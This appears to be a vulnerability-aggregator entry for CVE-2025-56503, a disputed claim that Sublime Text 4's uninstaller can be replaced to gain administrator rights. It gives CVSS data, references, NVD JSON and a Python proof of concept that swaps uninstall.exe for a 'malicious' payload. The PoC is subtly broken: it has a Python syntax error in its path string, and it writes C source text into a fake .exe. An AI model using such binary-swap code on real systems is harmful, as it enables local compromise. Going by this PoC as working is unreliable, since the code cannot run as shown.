CVE-2025-56503

Description

An issue in Sublime HQ Pty Ltd Sublime Text 4 4200 allows authenticated attackers with low-level privileges to escalate privileges to Administrator via replacing the uninstall file with a crafted binary in the installation folder. NOTE: this is disputed by the Supplier because replacing the uninstall file requires administrator permissions, i.e., there is no privilege escalation.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Sublime Text 4 4200

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-56503 PoC - Sublime Text 4 权限提升
# 前提条件：攻击者具有低权限账户和安装目录写权限

import os
import shutil
import ctypes

# 恶意程序示例（实际攻击中需要替换为真实的恶意代码）
MALICIOUS_PAYLOAD = '''
#include <windows.h>
int main() {
    // 以SYSTEM权限执行命令
    WinExec("cmd.exe /c whoami > C:\\temp\\pwned.txt", SW_HIDE);
    return 0;
}
'''

def exploit_sublime_text_privesc():
    """
    权限提升漏洞利用步骤：
    1. 定位Sublime Text安装目录
    2. 备份原始卸载程序
    3. 替换为恶意程序
    4. 等待管理员执行卸载
    """
    sublime_path = r"C:\Program Files\Sublime Text\"
    uninstall_original = os.path.join(sublime_path, "uninstall.exe")
    uninstall_backup = os.path.join(sublime_path, "uninstall.exe.bak")
    malicious_exe = "malicious_uninstall.exe"
    
    try:
        # 步骤1: 备份原始卸载程序
        if os.path.exists(uninstall_original):
            shutil.copy2(uninstall_original, uninstall_backup)
            print("[+] Original uninstaller backed up")
        
        # 步骤2: 创建恶意程序
        with open(malicious_exe, 'w') as f:
            f.write(MALICIOUS_PAYLOAD)
        print("[+] Malicious payload created")
        
        # 步骤3: 替换卸载程序
        shutil.copy2(malicious_exe, uninstall_original)
        print("[+] Malicious uninstaller placed")
        print("[!] Waiting for admin to trigger uninstall...")
        
    except PermissionError:
        print("[-] Insufficient permissions - requires low-privilege write access")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit_sublime_text_privesc()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-56503
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-56503
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-56503/
[4] VulDB https://vuldb.com/cve/CVE-2025-56503
[5] https://drive.google.com/file/d/1QDi9_RKJO-Gi_8jkHJKi7QV1Tajqh4WT/view?usp=sharing
[6] https://drive.google.com/file/d/1aP4S-WdFUL9ocNOucioIqxOgzreZ6Ey7/view?usp=sharing
[7] https://github.com/secxplorers/CVE-2025-56503

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-56503", "sourceIdentifier": "[email protected]", "published": "2025-11-10T20:15:47.990", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "An issue in Sublime HQ Pty Ltd Sublime Text 4 4200 allows authenticated attackers with low-level privileges to escalate privileges to Administrator via replacing the uninstall file with a crafted binary in the installation folder. NOTE: this is disputed by the Supplier because replacing the uninstall file requires administrator permissions, i.e., there is no privilege escalation."}, {"lang": "es", "value": "Un problema en Sublime HQ Pty Ltd Sublime Text 4 4200 permite a atacantes autenticados con privilegios de bajo nivel escalar privilegios a Administrador mediante el reemplazo del archivo de desinstalación con un binario manipulado en la carpeta de instalación."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://drive.google.com/file/d/1QDi9_RKJO-Gi_8jkHJKi7QV1Tajqh4WT/view?usp=sharing", "source": "[email protected]"}, {"url": "https://drive.google.com/file/d/1aP4S-WdFUL9ocNOucioIqxOgzreZ6Ey7/view?usp=sharing", "source": "[email protected]"}, {"url": "https://github.com/secxplorers/CVE-2025-56503", "source": "[email protected]"}]}}